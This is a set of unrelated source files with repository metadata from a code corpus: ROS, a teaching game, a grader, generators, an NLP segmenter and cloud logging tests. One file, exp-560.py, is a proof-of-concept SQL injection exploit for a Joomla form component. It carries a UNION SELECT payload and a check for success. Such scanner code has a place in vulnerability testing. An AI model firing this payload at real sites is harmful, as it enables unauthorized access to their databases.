self.robot_gps_pub.publish(robot_gps_pose)
except (tf2_ros.LookupException, tf2_ros.ConnectivityException, tf2_ros.ExtrapolationException):
return
if __name__ == '__main__':
encoder = encoder_localization()
encoder.Start()
| 45.573034
| 226
| 0.727934
|
bd89e70ef0f1ae97faab6d60af612063a44f7849
| 3,865
|
py
|
Python
|
examples/debug_test.py
|
designer-edu/designer
|
9c5d004e934300a30fb6d3148f4db313b69057df
|
[
"MIT"
] | 3
|
2022-01-21T00:08:02.000Z
|
2022-03-09T19:00:26.000Z
|
examples/debug_test.py
|
designer-edu/designer
|
9c5d004e934300a30fb6d3148f4db313b69057df
|
[
"MIT"
] | 5
|
2022-02-20T15:44:34.000Z
|
2022-03-05T15:57:25.000Z
|
examples/debug_test.py
|
designer-edu/designer
|
9c5d004e934300a30fb6d3148f4db313b69057df
|
[
"MIT"
] | null | null | null |
from designer import *
import random
from designer.objects.image import Image
WATER_DROP_SPEED = 5
PLANE_SPEED = 5
set_window_title(None)
World = {
'fires': [DesignerObject],
'drops': [DesignerObject],
'plane': DesignerObject,
'score': int,
'counter': DesignerObject
}
def create_world():
plane = create_plane()
return {
'fires': [],
'drops': [],
'plane': plane,
'score': 0,
'counter': text('black', '', 30, get_width() / 2, 100)
}
def create_water_drop() -> DesignerObject:
return circle("blue", 5)
def create_plane() -> DesignerObject:
plane = image("airplane.png")
plane['scale'] = .25
plane['hspeed'] = PLANE_SPEED
return plane
def create_fire(size=.1) -> DesignerObject:
fire = image('fire.png', anchor="midbottom", scale=.1)
fire['x'] = random.randint(0, get_width())
fire['y'] = get_height()
fire['scale_y'] = size
return fire
def go_right(plane):
plane['hspeed'] = PLANE_SPEED
plane['flip_x'] = False
def go_left(plane):
plane['hspeed'] = -PLANE_SPEED
plane['flip_x'] = True
def move_plane(world):
world['plane']['x'] += world['plane']['hspeed']
if world['plane']['x'] < 0:
go_right(world['plane'])
elif world['plane']['x'] > get_width():
go_left(world['plane'])
def flip_plane(world, key):
if key == 'left':
go_left(world['plane'])
elif key == 'right':
go_right(world['plane'])
def drop_water(world, key):
if key == 'space':
new_drop = create_water_drop()
move_below(new_drop, world['plane'])
world['drops'].append(new_drop)
def move_below(bottom, top):
bottom['y'] = top['y'] + top['height']/2
bottom['x'] = top['x']
def drop_waters(world):
kept = []
for drop in world['drops']:
drop['y'] += WATER_DROP_SPEED
if drop['y'] < get_height():
kept.append(drop)
else:
destroy(drop)
world['drops'] = kept
def filter_from(values, from_list):
result = []
for value in values:
if value not in from_list:
result.append(value)
return result
def collide_water_fire(world):
destroyed_fires = []
destroyed_drops = []
for drop in world['drops']:
for fire in world['fires']:
if colliding(drop, fire):
if drop not in destroyed_drops:
destroyed_drops.append(drop)
destroy(drop)
if fire not in destroyed_fires:
destroyed_fires.append(fire)
destroy(fire)
world['score'] += 1
world['drops'] = filter_from(world['drops'], destroyed_drops)
world['fires'] = filter_from(world['fires'], destroyed_fires)
def update_counter(world):
world['counter']['text'] = str(world['score'])
def grow_fire(world):
for fire in world['fires']:
fire['scale'] += .0001 * (1 + world['score'])
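    # Spawn chance decays as fires accumulate: randint(0, 10*n) equals zero
    # with probability 1/(10*n + 1), so a new fire is certain when none exist
    # and becomes rarer as the cap of 8 simultaneous fires approaches.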
if len(world['fires']) < 8 and not random.randint(0, 10 * len(world['fires'])):
new_fire = create_fire()
linear_animation(new_fire, 'alpha', 0, 1.0, 3)
world['fires'].append(new_fire)
def there_are_big_fires(world):
any_big_fires_so_far = False
for fire in world['fires']:
any_big_fires_so_far = any_big_fires_so_far or fire['scale_x'] >= 1
return any_big_fires_so_far
def print_score(world):
print("Your score was", world['score'])
def flash_game_over(world):
world['counter']['text'] = "GAME OVER!"
when("starting", create_world)
when('updating', move_plane)
when('updating', drop_waters)
when('updating', grow_fire)
when('updating', collide_water_fire)
when('updating', update_counter)
when('typing', drop_water)
when('typing', flip_plane)
when(there_are_big_fires, print_score, flash_game_over, pause)
debug()
| 24.15625
| 83
| 0.604916
|
eb91e56fffaadff5ef800a4db07ff524a64d3b95
| 131
|
py
|
Python
|
estimation/estimate_data.py
|
AnonTendim/si-library
|
f5f66e27b8db245c9f77c993bb1c1a38b1231d1d
|
[
"MIT"
] | 1
|
2022-03-15T00:24:08.000Z
|
2022-03-15T00:24:08.000Z
|
estimation/estimate_data.py
|
AnonTendim/si-library
|
f5f66e27b8db245c9f77c993bb1c1a38b1231d1d
|
[
"MIT"
] | null | null | null |
estimation/estimate_data.py
|
AnonTendim/si-library
|
f5f66e27b8db245c9f77c993bb1c1a38b1231d1d
|
[
"MIT"
] | 1
|
2021-12-27T18:47:27.000Z
|
2021-12-27T18:47:27.000Z
|
import utils.diagnosis_utils
def main():
path = 'data/'
filename = 'sample_input'
# TODO
if __name__ == "__main__":
main()
| 14.555556
| 28
| 0.664122
|
c9be83e932dedc42be6a3e3928a703831d590ec6
| 814
|
py
|
Python
|
Bugscan_exploits-master/exp_list/exp-560.py
|
csadsl/poc_exp
|
e3146262e7403f19f49ee2db56338fa3f8e119c9
|
[
"MIT"
] | 11
|
2020-05-30T13:53:49.000Z
|
2021-03-17T03:20:59.000Z
|
Bugscan_exploits-master/exp_list/exp-560.py
|
csadsl/poc_exp
|
e3146262e7403f19f49ee2db56338fa3f8e119c9
|
[
"MIT"
] | 6
|
2020-05-13T03:25:18.000Z
|
2020-07-21T06:24:16.000Z
|
Bugscan_exploits-master/exp_list/exp-560.py
|
csadsl/poc_exp
|
e3146262e7403f19f49ee2db56338fa3f8e119c9
|
[
"MIT"
] | 6
|
2020-05-30T13:53:51.000Z
|
2020-12-01T21:44:26.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
POC Name : Joomla Spider Form Maker <=3.4 SQL Injection
References: http://www.exploit-db.com/exploits/34637/
Author : ko0zhi
"""
def assign(service, arg):
if service == "joomla":
return True, arg
def audit(arg):
payload = '/index.php?option=com_formmaker&view=formmaker&id=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,CONCAT(0x7165696a71,IFNULL(CAST(md5(3.1415)%20AS%20CHAR),0x20),0x7175647871),NULL,NULL,NULL,NULL,NULL,NULL,NULL%23'
url = arg + payload
code, head, res, errcode, _ = curl.curl('"%s"' % url)
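    # The payload injects md5(3.1415) via UNION SELECT; finding its hex digest
    # in the response proves the injected SQL was executed.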
if code == 200 and "63e1f04640e83605c1d177544a5a0488" in res:
security_hole(url)
if __name__ == '__main__':
from dummy import *
audit(assign('joomla', 'http://www.example.com/')[1])
| 35.391304
| 233
| 0.652334
|
0be655fcbc69d87da1ec9717e667570932a1848d
| 1,952
|
py
|
Python
|
temas/Python3/correctores/listas/listas1.py
|
emartinm/TutorialesInteractivos
|
c0ef4d2c9449ea94e9a0ee4169faad5e47c874bc
|
[
"MIT"
] | 2
|
2016-12-13T12:29:15.000Z
|
2017-02-09T11:06:24.000Z
|
temas/Python3/correctores/listas/listas1.py
|
emartinm/TutorialesInteractivos
|
c0ef4d2c9449ea94e9a0ee4169faad5e47c874bc
|
[
"MIT"
] | null | null | null |
temas/Python3/correctores/listas/listas1.py
|
emartinm/TutorialesInteractivos
|
c0ef4d2c9449ea94e9a0ee4169faad5e47c874bc
|
[
"MIT"
] | null | null | null |
# -*- coding: UTF-8 -*-
import sys
from correctores.common.corrector_funciones import corrector_funciones
########################################################################
#### This is what must be changed for each problem:                 ####
####  - epsilon: for comparing floats and complex, if you need it   ####
####  - genera_casos: returns a list of test cases                  ####
####  - the function we want to check, with its hole                ####
####  - get_function: returns the function we want to check         ####
########################################################################
def epsilon():
return 1E-9
def correct_eval_poly(d):
"""This function evaluates the polynomial poly at point x.
    Poly is a list of floats containing the coefficients
    of the polynomial
    poly[i] -> coefficient of degree i
Parameters
----------
poly: [float]
Coefficients of the polynomial,
        where poly[i] -> coefficient of degree i
x : float
Point
Returns
-------
float
Value of the polynomial at point x
Example
-------
>>> eval_poly( [1.0, 1.0], 2)
3.0
"""
poly, x = d["poly"], d['x']
result = 0.0
power = 1
degree = len(poly) - 1
i = 0
while i <= degree:
result = result + poly[i] * power
power = power * x
i = i + 1
return (d,result)
def genera_casos():
    # Generate the test cases to be checked
param_list = [{'poly':[2.0,0.0,1.0],'x':3.0},{'poly':[2.0,3.0,1.0],'x':-3.0},{'poly':[],'x':3.0}]
return map(correct_eval_poly,param_list)
def eval_poly(poly, x):
@@@CODE@@@
def get_function():
return eval_poly
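# Illustrative sketch (not part of the original template): one possible body
# for the @@@CODE@@@ hole above, mirroring correct_eval_poly:
#
# def eval_poly(poly, x):
#     result = 0.0
#     power = 1
#     for coefficient in poly:      # poly[i] -> coefficient of degree i
#         result += coefficient * power
#         power *= x
#     return result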
#################################
#### Do not touch this part ####
#################################
if __name__ == "__main__":
corrector_funciones(sys.argv[1], get_function(), genera_casos(), epsilon())
| 26.739726
| 101
| 0.512807
|
85b34771ebed60fe968fd1aab89d6d20c6ef783d
| 1,001
|
py
|
Python
|
generator/group.py
|
Margoburrito/python_training_hw
|
836c4445f1821bac4df76418a1c8178d18b616c1
|
[
"Apache-2.0"
] | null | null | null |
generator/group.py
|
Margoburrito/python_training_hw
|
836c4445f1821bac4df76418a1c8178d18b616c1
|
[
"Apache-2.0"
] | null | null | null |
generator/group.py
|
Margoburrito/python_training_hw
|
836c4445f1821bac4df76418a1c8178d18b616c1
|
[
"Apache-2.0"
] | null | null | null |
from model.group import Group
import random
import string
import os.path
import jsonpickle
import getopt
import sys
try:
opts, args = getopt.getopt(sys.argv[1:], "n:f:", ["number of groups", "file"])
except getopt.GetoptError as err:
    print(err)  # getopt has no usage(); report the parse error instead
sys.exit(2)
n = 5
f = "data/groups.json"
for o, a in opts:
if o == "-n":
n = int(a)
elif o == "-f":
f = a
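# Illustrative invocation (hypothetical values): generate 10 random groups
# into data/groups.json:
#   python generator/group.py -n 10 -f data/groups.json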
def random_string(prefix, maxlen):
symbols = string.ascii_letters + string.digits + string.punctuation + " "*10
return prefix + "".join([random.choice(symbols) for i in range(random.randrange(maxlen))])
testdata = [Group(name="", header="", footer="")] + [
Group(name=random_string("name", 10), header=random_string("header", 20), footer=random_string("footer", 20))
for i in range(n)
]
file = os.path.join(os.path.dirname(os.path.abspath(__file__)), "..", f)
with open(file, "w") as out:
jsonpickle.set_encoder_options("json", indent=2)
out.write(jsonpickle.encode(testdata))
| 25.025
| 113
| 0.654346
|
368eb49f03f9e6eadabe92b733c0d09c13281ba9
| 841
|
py
|
Python
|
wechatpy/__init__.py
|
hunter007/wechatpy
|
5bd3587dde3a25d47bd72ba0b1949c2b47882fb7
|
[
"MIT"
] | null | null | null |
wechatpy/__init__.py
|
hunter007/wechatpy
|
5bd3587dde3a25d47bd72ba0b1949c2b47882fb7
|
[
"MIT"
] | null | null | null |
wechatpy/__init__.py
|
hunter007/wechatpy
|
5bd3587dde3a25d47bd72ba0b1949c2b47882fb7
|
[
"MIT"
] | null | null | null |
from __future__ import absolute_import, unicode_literals
import logging
from wechatpy.client import WeChatClient # NOQA
from wechatpy.component import ComponentOAuth, WeChatComponent # NOQA
from wechatpy.exceptions import WeChatClientException, WeChatException, WeChatOAuthException, WeChatPayException # NOQA
from wechatpy.oauth import WeChatOAuth # NOQA
from wechatpy.parser import parse_message # NOQA
from wechatpy.pay import WeChatPay # NOQA
from wechatpy.replies import create_reply # NOQA
__version__ = '1.6.0'
__author__ = 'messense'
# Set default logging handler to avoid "No handler found" warnings.
try: # Python 2.7+
from logging import NullHandler
except ImportError:
class NullHandler(logging.Handler):
def emit(self, record):
pass
logging.getLogger(__name__).addHandler(NullHandler())
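# Illustrative consumer-side setup: applications opt in to wechatpy's logs by
# configuring logging themselves, e.g.
#
#   import logging
#   logging.basicConfig(level=logging.DEBUG)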
| 33.64
| 120
| 0.785969
|
be3add7fde6e211808e2d8fa8817664e248d06c5
| 97
|
py
|
Python
|
curso-em-video/resposta_usuario.py
|
mvrramos/Pogramacao-Python
|
4b289372aed3080c55a94beed3ea059619d51e48
|
[
"MIT"
] | null | null | null |
curso-em-video/resposta_usuario.py
|
mvrramos/Pogramacao-Python
|
4b289372aed3080c55a94beed3ea059619d51e48
|
[
"MIT"
] | null | null | null |
curso-em-video/resposta_usuario.py
|
mvrramos/Pogramacao-Python
|
4b289372aed3080c55a94beed3ea059619d51e48
|
[
"MIT"
] | null | null | null |
# Replace the name
nome = input('Qual o seu nome?')
print('Olá', nome, '! Prazer em te conhecer')
| 19.4
| 44
| 0.670103
|
8b8a145022b79df3bd47a980ce6d18a5ffcf9bbb
| 1,540
|
py
|
Python
|
src/get_groundtruth.py
|
maumueller/ldp-jaccard
|
5b956a11b6bdbfebbc2e6c3ad730426ffaa6b071
|
[
"MIT"
] | 1
|
2021-09-11T12:57:18.000Z
|
2021-09-11T12:57:18.000Z
|
src/get_groundtruth.py
|
maumueller/ldp-jaccard
|
5b956a11b6bdbfebbc2e6c3ad730426ffaa6b071
|
[
"MIT"
] | null | null | null |
src/get_groundtruth.py
|
maumueller/ldp-jaccard
|
5b956a11b6bdbfebbc2e6c3ad730426ffaa6b071
|
[
"MIT"
] | null | null | null |
from helpers import jaccard
from dataset_reader import read_data
import random
import pickle
import sys
def to_set(X):
Y = [set(x) for x in X.values()]
return Y
def bruteforce(X):
distances = {}
for i, x in enumerate(X):
for j, y in enumerate(X):
distances.setdefault(i, []).append((j, jaccard(x, y)))
for k in distances:
distances[k].sort(key=lambda x: -x[1])
return distances
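# For reference, a minimal Jaccard similarity over Python sets (assuming
# helpers.jaccard implements the standard |x & y| / |x | y| definition):
#
# def jaccard(x, y):
#     union = x | y
#     return len(x & y) / len(union) if union else 1.0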
def find_interesting_queries(X, query_id):
distances = bruteforce(X)
if query_id:
return [query_id], distances
else:
interesting_queries = []
for k in distances:
if distances[k][10][1] > 0.2:
interesting_queries.append(k)
print(len(interesting_queries))
random.shuffle(interesting_queries)
return interesting_queries[:50], distances
if __name__ == '__main__':
ds = sys.argv[1]
tau = int(sys.argv[2])
random.seed(12345)
attributes = {
"ds": ds,
"tau": tau
}
query_id = None
if len(sys.argv) == 4:
query_id = int(sys.argv[3])
dataset = to_set(read_data(ds))
new_dataset = []
for x in dataset:
if len(x) >= tau:
new_dataset.append(x)
print(len(dataset))
print(len(new_dataset))
queries, ground_truth = find_interesting_queries(new_dataset, query_id)
with open(ds + "." + str(tau) + '.pickle', 'wb') as f:
pickle.dump([queries, ground_truth, attributes],
f, pickle.HIGHEST_PROTOCOL)
| 23.333333
| 75
| 0.597403
|
8eda6358c4f36029757b473193f92cb9bfc3af2a
| 3,178
|
py
|
Python
|
main.py
|
yash935/Discord-YouTube-Notifier
|
138164923380d90b30c4eb70d3f34b59a270d53d
|
[
"MIT"
] | null | null | null |
main.py
|
yash935/Discord-YouTube-Notifier
|
138164923380d90b30c4eb70d3f34b59a270d53d
|
[
"MIT"
] | null | null | null |
main.py
|
yash935/Discord-YouTube-Notifier
|
138164923380d90b30c4eb70d3f34b59a270d53d
|
[
"MIT"
] | null | null | null |
import discord
import time
import asyncio
import sys
import os
from Implementation import YouTuber
from config import Config
config = Config('config.yml')
client = discord.Client()
youtubers = config.getYouTubersList() if (config.getYouTubersNr() != 0) else sys.exit()
if (config.getDiscordChannelNr() == 0): sys.exit()
id = ''
GOOGLE_API = config.getConnectionData()[0]
pingEveryXMinutes = config.getPingTime()
threads = []
processes = []
i = 0
while i < config.getYouTubersNr():
temp_list = []
temp_list.append(config.getYouTubersList()[i]['name'])
temp_list.append(id) if not config.getYouTubersList()[i]['channelID'] else temp_list.append(config.getYouTubersList()[i]['channelID'])
temp_list.append(True) if not id else temp_list.append(False)
temp_list.append('')
threads.append(temp_list)
i += 1
i = 0
while i < config.getYouTubersNr():
processes.append(YouTuber(GOOGLE_API, threads[i][1], threads[i][2]))
i += 1
async def update():
while True:
try:
waittime = pingEveryXMinutes * 60
item = 0
while item < config.getYouTubersNr():
data = processes[item].update()
print('Checking for new videos from {}'.format(threads[item][0]))
if processes[item].isNewVideo():
print('{} HAS UPLOADED A NEW VIDEO! PUSHING UPDATE ON DISCORD.'.format(threads[item][0]))
for x in range (0, config.getDiscordChannelNr()):
newvideo = config.getDiscordChannelList()[x]['New video'].format(threads[item][0]) + '\n{}'.format(processes[item].getVideoLink(processes[item].videosData[0][1]))
await client.send_message(client.get_channel(str(config.getDiscordChannelList()[x]['channelID'])), newvideo)
if processes[item].isUserLive():
if not processes[item].liveId == threads[item][3]:
print('{} IS LIVESTREAMING NOW! PUSHING UPDATE ON DISCORD.'.format(threads[item][0]))
threads[item][3] = processes[item].liveId
for x in range (0, config.getDiscordChannelNr()):
livestream = config.getDiscordChannelList()[x]['Livestream'].format(threads[item][0]) + '\n{}'.format(processes[item].getVideoLink(processes[item].getUserLiveData()))
await client.send_message(client.get_channel(str(config.getDiscordChannelList()[x]['channelID'])), livestream)
item += 1
except:
pass
while waittime > 0:
mins, secs = divmod(waittime, 60)
timeformat = '{:02d}:{:02d}'.format(mins, secs)
sys.stdout.write('Rechecking in ' + str(timeformat) + '\r')
waittime -= 1
await asyncio.sleep(1)
@client.event
async def on_ready():
print('Logged in as:')
print(client.user.name)
print(client.user.id)
print('---------------------------------------')
print('Bot running.')
asyncio.ensure_future(update())
client.run(os.getenv('Token'))
| 41.272727
| 195
| 0.592196
|
bbce2c403c6f555de8a6fb0c1df763953862b012
| 2,954
|
py
|
Python
|
google-trainer-code-only/train.py
|
teogenesmoura/pesquisaGoogle
|
6f3d5e90a316ada9a7060097da20f6b341b82ec4
|
[
"MIT"
] | null | null | null |
google-trainer-code-only/train.py
|
teogenesmoura/pesquisaGoogle
|
6f3d5e90a316ada9a7060097da20f6b341b82ec4
|
[
"MIT"
] | null | null | null |
google-trainer-code-only/train.py
|
teogenesmoura/pesquisaGoogle
|
6f3d5e90a316ada9a7060097da20f6b341b82ec4
|
[
"MIT"
] | null | null | null |
import sys
import csv
import os
# from subprocess import call
from subprocess import Popen, PIPE, STDOUT
import datetime
now = datetime.datetime.strftime(datetime.datetime.now(), '%Y%m%d%H%M')
folder = now + '-training'
users_filename = 'input/users-prod.csv'
f = open(users_filename, 'r')
print('Reading %s file' % users_filename)
users_reader = csv.reader(open(users_filename))
for row in users_reader:
print("------------------------------------------------")
print('Reading next user in %s: %s' % (users_filename,row))
email = row[0]
passwd = row[1]
alias = row[2]
queries = ""
queries_filename = 'input/queries-%s.csv' % alias
queries_reader = csv.reader(open(queries_filename))
print('Reading %s file' % queries_filename)
for query_row in queries_reader:
query = query_row[0]
# print(query)
if queries:
queries = queries + "," + query
else:
queries = query
urls = ""
urls_filename = 'input/urls-%s.csv' % alias
urls_reader = csv.reader(open(urls_filename))
print('Reading %s file' % urls_filename)
for url_row in urls_reader:
url = url_row[0]
# print(url)
if urls:
urls = urls + "," + url
else:
urls = url
# print("\n\n")
print("\n[%s] Starting training of %s" % (now,alias))
print("")
print('Terms to be Googled: %s\n' % queries)
print('URLs to be visited: %s\n' % urls)
casper_cmd = "./casperjs train.js %s %s %s %s %s %s" % (folder, email, passwd, alias, queries, urls)
casper_logfile = "output/%s-treinamento.%s.output.txt" % (now,alias)
print('Calling CasperJS script to emulate browser navigation...')
print('Check file %s for details' % casper_logfile)
print('Here is the command about to be executed:\n')
print('$ %s\n' % casper_cmd)
sys.stdout.flush()
# call(["./casperjs", "train.js", folder, email, passwd, alias, queries, urls, "| tee -a", "output/treinamento.$(date +%Y%m%d%H%M).output.txt"])
# p = Popen(["./casperjs", "train.js", folder, email, passwd, alias, queries, urls], stdin=PIPE, stdout=PIPE, stderr=PIPE)
# # output, err = p.communicate(b"input data that is passed to subprocess' stdin")
# output, err = p.communicate()
# rc = p.returncode
p1 = Popen(["./casperjs", "train.js", folder, email, passwd, alias, queries, urls], stdout=PIPE)
p2 = Popen(["tee", casper_logfile], stdin=p1.stdout)
p1.stdout.close() # Allow p1 to receive a SIGPIPE if p2 exits.
output = p2.communicate()[0]
status = p2.returncode
print('Status code',status)
if status != 0:
print('CasperJS Failed')
sys.exit('CasperJS falhou')
# os.system("cd output; zip %s-training.zip %s-training/*; cd .." % (now,now))
print("[%s] Finishing %s's training\n\n" % (now,alias))
# outfile = open("output/%s/treinamento.%s.%s.output.txt" % (folder,alias,now))
# outfile.write(output)
# outfile.flush()
# outfile.close()
# errfile = open("output/%s/treinamento.%s.%s.errors.txt" % (folder,alias,now))
# errfile.write(err)
# errfile.flush()
# errfile.close()
| 29.247525
| 145
| 0.658091
|
1f2379e3e17b3da850cf5cc83694299db334bbbe
| 266
|
py
|
Python
|
hmtl/training/metrics/__init__.py
|
rahular/joint-coref-srl
|
cd85fb4e11af1a1ea400ed657d0a4511c1d6c6be
|
[
"MIT"
] | null | null | null |
hmtl/training/metrics/__init__.py
|
rahular/joint-coref-srl
|
cd85fb4e11af1a1ea400ed657d0a4511c1d6c6be
|
[
"MIT"
] | null | null | null |
hmtl/training/metrics/__init__.py
|
rahular/joint-coref-srl
|
cd85fb4e11af1a1ea400ed657d0a4511c1d6c6be
|
[
"MIT"
] | null | null | null |
# coding: utf-8
from hmtl.training.metrics.relation_f1_measure import RelationF1Measure
from hmtl.training.metrics.conll_coref_full_scores import ConllCorefFullScores
from hmtl.training.metrics.accuracy import Accuracy
from hmtl.training.metrics.f1_score import F1
| 38
| 78
| 0.868421
|
d1fe222808ca4d706df3b3dc7f5605463fd2a300
| 1,420
|
py
|
Python
|
snownlp/seg/seg.py
|
erning/snownlp
|
90c07d31269421d0868f34b37868380d44e034b6
|
[
"MIT"
] | 1
|
2017-03-23T01:52:24.000Z
|
2017-03-23T01:52:24.000Z
|
snownlp/seg/seg.py
|
erning/snownlp
|
90c07d31269421d0868f34b37868380d44e034b6
|
[
"MIT"
] | null | null | null |
snownlp/seg/seg.py
|
erning/snownlp
|
90c07d31269421d0868f34b37868380d44e034b6
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import print_function
from __future__ import unicode_literals
import codecs
from ..utils.tnt import TnT
from .y09_2047 import CharacterBasedGenerativeModel
class Seg(object):
def __init__(self, name='tnt'):
if name == 'tnt':
self.segger = TnT()
else:
self.segger = CharacterBasedGenerativeModel()
def save(self, fname, iszip=False):
self.segger.save(fname, iszip)
def load(self, fname, iszip=False):
self.segger.load(fname, iszip)
def train(self, file_name):
fr = codecs.open(file_name, 'r', 'utf-8')
data = []
for i in fr:
line = i.strip()
if not line:
continue
            tmp = [x.split('/') for x in line.split()]  # list, not map: Python 3's map() is a one-shot iterator
data.append(tmp)
fr.close()
self.segger.train(data)
def seg(self, sentence):
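        # The tagger labels each character b/m/e/s (begin/middle/end/single);
        # buffered characters are emitted as a word on an 'e' tag, and the
        # buffer is flushed whenever a new word starts with 'b' or 's'.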
ret = self.segger.tag(sentence)
tmp = ''
for i in ret:
if i[1] == 'e':
yield tmp+i[0]
tmp = ''
elif i[1] == 'b' or i[1] == 's':
if tmp:
yield tmp
tmp = i[0]
else:
tmp += i[0]
if tmp:
yield tmp
if __name__ == '__main__':
seg = Seg()
seg.train('data.txt')
print(' '.join(seg.seg('主要是用来放置一些简单快速的中文分词和词性标注的程序')))
| 24.482759
| 59
| 0.505634
|
e4e93279b2808be757e128f9b6d703bff752725a
| 9,674
|
py
|
Python
|
unit_tests/logging/test_metric.py
|
Ofekmeister/google-cloud-python
|
07dd51bc447beca67b8da1c66f1dfb944ef70418
|
[
"Apache-2.0"
] | null | null | null |
unit_tests/logging/test_metric.py
|
Ofekmeister/google-cloud-python
|
07dd51bc447beca67b8da1c66f1dfb944ef70418
|
[
"Apache-2.0"
] | null | null | null |
unit_tests/logging/test_metric.py
|
Ofekmeister/google-cloud-python
|
07dd51bc447beca67b8da1c66f1dfb944ef70418
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2016 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
class TestMetric(unittest.TestCase):
PROJECT = 'test-project'
METRIC_NAME = 'metric-name'
FILTER = 'logName:syslog AND severity>=ERROR'
DESCRIPTION = 'DESCRIPTION'
def _getTargetClass(self):
from google.cloud.logging.metric import Metric
return Metric
def _makeOne(self, *args, **kw):
return self._getTargetClass()(*args, **kw)
def test_ctor_defaults(self):
FULL = 'projects/%s/metrics/%s' % (self.PROJECT, self.METRIC_NAME)
client = _Client(self.PROJECT)
metric = self._makeOne(self.METRIC_NAME, client=client)
self.assertEqual(metric.name, self.METRIC_NAME)
self.assertEqual(metric.filter_, None)
self.assertEqual(metric.description, '')
self.assertTrue(metric.client is client)
self.assertEqual(metric.project, self.PROJECT)
self.assertEqual(metric.full_name, FULL)
self.assertEqual(metric.path, '/%s' % (FULL,))
def test_ctor_explicit(self):
FULL = 'projects/%s/metrics/%s' % (self.PROJECT, self.METRIC_NAME)
client = _Client(self.PROJECT)
metric = self._makeOne(self.METRIC_NAME, self.FILTER,
client=client, description=self.DESCRIPTION)
self.assertEqual(metric.name, self.METRIC_NAME)
self.assertEqual(metric.filter_, self.FILTER)
self.assertEqual(metric.description, self.DESCRIPTION)
self.assertTrue(metric.client is client)
self.assertEqual(metric.project, self.PROJECT)
self.assertEqual(metric.full_name, FULL)
self.assertEqual(metric.path, '/%s' % (FULL,))
def test_from_api_repr_minimal(self):
client = _Client(project=self.PROJECT)
FULL = 'projects/%s/metrics/%s' % (self.PROJECT, self.METRIC_NAME)
RESOURCE = {
'name': self.METRIC_NAME,
'filter': self.FILTER,
}
klass = self._getTargetClass()
metric = klass.from_api_repr(RESOURCE, client=client)
self.assertEqual(metric.name, self.METRIC_NAME)
self.assertEqual(metric.filter_, self.FILTER)
self.assertEqual(metric.description, '')
self.assertTrue(metric._client is client)
self.assertEqual(metric.project, self.PROJECT)
self.assertEqual(metric.full_name, FULL)
def test_from_api_repr_w_description(self):
client = _Client(project=self.PROJECT)
FULL = 'projects/%s/metrics/%s' % (self.PROJECT, self.METRIC_NAME)
DESCRIPTION = 'DESCRIPTION'
RESOURCE = {
'name': self.METRIC_NAME,
'filter': self.FILTER,
'description': DESCRIPTION,
}
klass = self._getTargetClass()
metric = klass.from_api_repr(RESOURCE, client=client)
self.assertEqual(metric.name, self.METRIC_NAME)
self.assertEqual(metric.filter_, self.FILTER)
self.assertEqual(metric.description, DESCRIPTION)
self.assertTrue(metric._client is client)
self.assertEqual(metric.project, self.PROJECT)
self.assertEqual(metric.full_name, FULL)
def test_create_w_bound_client(self):
client = _Client(project=self.PROJECT)
api = client.metrics_api = _DummyMetricsAPI()
metric = self._makeOne(self.METRIC_NAME, self.FILTER, client=client)
metric.create()
self.assertEqual(
api._metric_create_called_with,
(self.PROJECT, self.METRIC_NAME, self.FILTER, ''))
def test_create_w_alternate_client(self):
client1 = _Client(project=self.PROJECT)
client2 = _Client(project=self.PROJECT)
api = client2.metrics_api = _DummyMetricsAPI()
metric = self._makeOne(self.METRIC_NAME, self.FILTER, client=client1,
description=self.DESCRIPTION)
metric.create(client=client2)
self.assertEqual(
api._metric_create_called_with,
(self.PROJECT, self.METRIC_NAME, self.FILTER, self.DESCRIPTION))
def test_exists_miss_w_bound_client(self):
client = _Client(project=self.PROJECT)
api = client.metrics_api = _DummyMetricsAPI()
metric = self._makeOne(self.METRIC_NAME, self.FILTER, client=client)
self.assertFalse(metric.exists())
self.assertEqual(api._metric_get_called_with,
(self.PROJECT, self.METRIC_NAME))
def test_exists_hit_w_alternate_client(self):
RESOURCE = {
'name': self.METRIC_NAME,
'filter': self.FILTER,
}
client1 = _Client(project=self.PROJECT)
client2 = _Client(project=self.PROJECT)
api = client2.metrics_api = _DummyMetricsAPI()
api._metric_get_response = RESOURCE
metric = self._makeOne(self.METRIC_NAME, self.FILTER, client=client1)
self.assertTrue(metric.exists(client=client2))
self.assertEqual(api._metric_get_called_with,
(self.PROJECT, self.METRIC_NAME))
def test_reload_w_bound_client(self):
NEW_FILTER = 'logName:syslog AND severity>=INFO'
RESOURCE = {
'name': self.METRIC_NAME,
'filter': NEW_FILTER,
}
client = _Client(project=self.PROJECT)
api = client.metrics_api = _DummyMetricsAPI()
api._metric_get_response = RESOURCE
metric = self._makeOne(self.METRIC_NAME, self.FILTER, client=client,
description=self.DESCRIPTION)
metric.reload()
self.assertEqual(metric.filter_, NEW_FILTER)
self.assertEqual(metric.description, '')
self.assertEqual(api._metric_get_called_with,
(self.PROJECT, self.METRIC_NAME))
def test_reload_w_alternate_client(self):
NEW_FILTER = 'logName:syslog AND severity>=INFO'
RESOURCE = {
'name': self.METRIC_NAME,
'description': self.DESCRIPTION,
'filter': NEW_FILTER,
}
client1 = _Client(project=self.PROJECT)
client2 = _Client(project=self.PROJECT)
api = client2.metrics_api = _DummyMetricsAPI()
api._metric_get_response = RESOURCE
metric = self._makeOne(self.METRIC_NAME, self.FILTER, client=client1)
metric.reload(client=client2)
self.assertEqual(metric.filter_, NEW_FILTER)
self.assertEqual(metric.description, self.DESCRIPTION)
self.assertEqual(api._metric_get_called_with,
(self.PROJECT, self.METRIC_NAME))
def test_update_w_bound_client(self):
client = _Client(project=self.PROJECT)
api = client.metrics_api = _DummyMetricsAPI()
metric = self._makeOne(self.METRIC_NAME, self.FILTER, client=client)
metric.update()
self.assertEqual(
api._metric_update_called_with,
(self.PROJECT, self.METRIC_NAME, self.FILTER, ''))
def test_update_w_alternate_client(self):
client1 = _Client(project=self.PROJECT)
client2 = _Client(project=self.PROJECT)
api = client2.metrics_api = _DummyMetricsAPI()
